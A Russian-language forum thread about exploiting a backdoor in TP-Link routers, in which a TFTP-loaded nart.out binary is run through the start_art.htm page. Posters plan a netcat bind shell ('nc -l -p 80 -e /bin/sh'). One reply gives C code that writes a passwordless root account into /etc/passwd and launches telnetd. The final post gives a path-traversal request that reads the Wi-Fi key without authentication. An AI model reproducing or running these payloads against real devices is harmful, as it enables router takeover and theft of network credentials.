- Backdoor в роутерах TP-Link, нужен Ваш совет, Психиатр, 03:51 , 08-Июн-14 (1)
Он (router) точно nart.out от тебя по tftp загрузил? Смотри логи tftp сервера, не всегда имя файла именно nart.out.
- Backdoor в роутерах TP-Link, нужен Ваш совет, specx2, 14:40 , 08-Июн-14 (2)
> Он (router) точно nart.out от тебя по tftp загрузил? > Смотри логи tftp сервера, не всегда имя файла именно nart.out.Да точно, логи это подтверждают, если заливать мусор вместо бинарника, результат "Art download failed"
- Backdoor в роутерах TP-Link, нужен Ваш совет, 1, 17:30 , 08-Июн-14 (3)
> Прошивку менять на OpenWRT затруднительно. Устройства дешёвые, работу свою выполняют. > Решил я пере-собрать под MIPS самостоятельно бинарник, с горем пополам развернул тулчейн. > Определился что на выходе должен получиться > ELF 32-bit MSB executable, MIPS, MIPS-III version 1 (SYSV), statically linked > С параметром nc -l -p 80 -e /bin/sh > Теперь не могу понять как именно собрать Netcat, что бы при исполнении > на роутере выполнялась опция nc -l -p 80 -e /bin/sh слушай, а не проще openwrt настроить и растиражировать? там фаером можно практич любые сетевые дырки закрыть в том числе и на будущее,имхо
- Backdoor в роутерах TP-Link, нужен Ваш совет, specx2, 18:49 , 08-Июн-14 (4)
>> Прошивку менять на OpenWRT затруднительно. Устройства дешёвые, работу свою выполняют. >> Решил я пере-собрать под MIPS самостоятельно бинарник, с горем пополам развернул тулчейн. >> Определился что на выходе должен получиться >> ELF 32-bit MSB executable, MIPS, MIPS-III version 1 (SYSV), statically linked >> С параметром nc -l -p 80 -e /bin/sh >> Теперь не могу понять как именно собрать Netcat, что бы при исполнении >> на роутере выполнялась опция nc -l -p 80 -e /bin/sh > слушай, а не проще openwrt настроить и растиражировать? > там фаером можно практич любые сетевые дырки закрыть в том числе и > на будущее,имхо Суть в проверки теории на практики, я ведь обращаюсь с конкретным вопросом.
- Backdoor в роутерах TP-Link, нужен Ваш совет, atlas28, 19:13 , 09-Июн-14 (5)
>[оверквотинг удален] >>> Решил я пере-собрать под MIPS самостоятельно бинарник, с горем пополам развернул тулчейн. >>> Определился что на выходе должен получиться >>> ELF 32-bit MSB executable, MIPS, MIPS-III version 1 (SYSV), statically linked >>> С параметром nc -l -p 80 -e /bin/sh >>> Теперь не могу понять как именно собрать Netcat, что бы при исполнении >>> на роутере выполнялась опция nc -l -p 80 -e /bin/sh >> слушай, а не проще openwrt настроить и растиражировать? >> там фаером можно практич любые сетевые дырки закрыть в том числе и >> на будущее,имхо > Суть в проверки теории на практики, я ведь обращаюсь с конкретным вопросом. Столкнулся с аналогичной проблемой, файл заливается, но коннекта нет и порт не открывается. nart.out я не компилировал, но если открыть текстовым редактором и найти там 2222, то порт можно менять, только мне это не помогло. Есть идеи?
- Backdoor в роутерах TP-Link, нужен Ваш совет, anesth, 02:46 , 18-Сен-16 (7)
>[оверквотинг удален] >>>> Теперь не могу понять как именно собрать Netcat, что бы при исполнении >>>> на роутере выполнялась опция nc -l -p 80 -e /bin/sh >>> слушай, а не проще openwrt настроить и растиражировать? >>> там фаером можно практич любые сетевые дырки закрыть в том числе и >>> на будущее,имхо >> Суть в проверки теории на практики, я ведь обращаюсь с конкретным вопросом. > Столкнулся с аналогичной проблемой, файл заливается, но коннекта нет и порт не > открывается. nart.out я не компилировал, но если открыть текстовым редактором и > найти там 2222, то порт можно менять, только мне это не > помогло. Есть идеи?К nart.out полагается еще art.ko (который работает с pci при выгруженном ath9k) и вместе они нужны для удаленной работы ART - atheros radio tool. ART существует только под оффтопик, но если собрать nart под любую платформу, хоть бы и под openwrt, под UBNT AirOS, под ďd - главное тулчейн и сорс ядра чтобы был, радио на роутере можно например откалибровать с PC. Еще много чего можно :) даже без свиндовса и ART, протокол работы nart простой текстовый, команда-ответ. Полезный тулсет, например если фирмваре с калибровкой убита. В прошивках тплинка start_art.htm не задумывался как бекдор, чисто головотяпство для удобства, чтобы можно было залить нарт не вскрывая устройство. А так-то да, собираешь простой код который откроет сокет, форкнется и запустит sh - и есть шелл. #include <stdio.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int main(int argc,char **argv) { char *st="admin::0:0:adm:/:/bin/sh\n"; char *av[]={"busybox","telnetd",NULL}; char *ev[]={NULL}; int fd=open("/etc/passwd",O_CREAT|O_RDWR); if(fd) { write(fd,st,strlen(st)); close(fd); execve("/bin/busybox",av,ev); } } - Backdoor в роутерах TP-Link, нужен Ваш совет, anesth, 03:00 , 18-Сен-16 (8)
пример правильного nart (собрано для tplink wr741nd с trunk openwrt r39xxx)$ nc -v 192.168.0.30 2390 nc: ap (192.168.0.30) 2390 [2390] open nc: using stream socket help 7508 CONTROL BEGIN help 1012 INFO exit: exits the program 1012 INFO help, ?: supplies information about the commands and parameters 1012 INFO hello: checks that the network link to nart is working, synchronizes commands and responses 1012 INFO transmit, tx, t: causes the specified device to transmit 1012 INFO receive, rx, r: causes the specified device to receive 1012 INFO carrier: causes the device to transmit the carrier tone 1012 INFO sleep: pauses program execution for the specified number of milliseconds 1012 INFO load, card, attach: loads the card 1012 INFO unload, remove, detach: unloads the card 1012 INFO reset: resets the device 1012 INFO rr: reads a device register 1012 INFO rw: writes a device register with the specified value 1012 INFO sr, sl: prints the current list of sticky writes 1012 INFO sw: sticky write of a device field/register, sticky writes are performed after every device reset 1012 INFO sc: clear sticky field/register from list, last-on, first-off order 1012 INFO fr: field read 1012 INFO fw: field write 1012 INFO fl: list all the matching fields 1012 INFO mr: memory read 1012 INFO mw: memory write 1012 INFO er: eeprom read 1012 INFO ew: eeprom write 1012 INFO or: otp read 1012 INFO ow: otp write 1012 INFO cr: pci config read 1012 INFO cw: pci config write 1012 INFO rd: enable register read/write debug mode 1012 INFO tgr: transmit gain table read 1012 INFO tgw: transmit gain table write 1012 INFO restore: restores calibration information from card 1012 INFO commit, save: finalize calibration and write data to device 1012 INFO pcie, boot: write pcie configuration data to chip 1012 INFO check: check calibration data on device 1012 INFO set: set a configuration parameter on the card 1012 INFO get: get a configuration parameter from the card 1012 INFO setTP: set target power configuration parameter on the card 1012 INFO getTP: get target power configuration parameter from the card 1012 INFO erase 1012 INFO pl: turn on packet logging 1012 INFO channel: retrieve and display a list of the valid channels 1012 INFO noisefloor, nf: compute the noise floor 1012 INFO nfg: retrieve and display the calibrated noise floor measurements 1012 INFO targetPower, tp: retrieve and display the target power values 1012 INFO start: start the current command 1012 INFO stop: stop the current command 1012 INFO template: Manipulates the configuration and calibration template 1012 INFO error: allows you to control how error messages are displayed 1012 INFO version: retrieve version information 7506 CONTROL DONE help
- Backdoor в роутерах TP-Link, нужен Ваш совет, specx2, 00:36 , 23-Июн-14 (6)
Вообщем уязвимость существует на некоторых прошивках, позволяющая прочитать файл с ключом от Wi-Fi без авторизации если открыт доступ к WAN Выполнив в терминале GET ip:port/help/../../tmp/ath0.ap_bss
|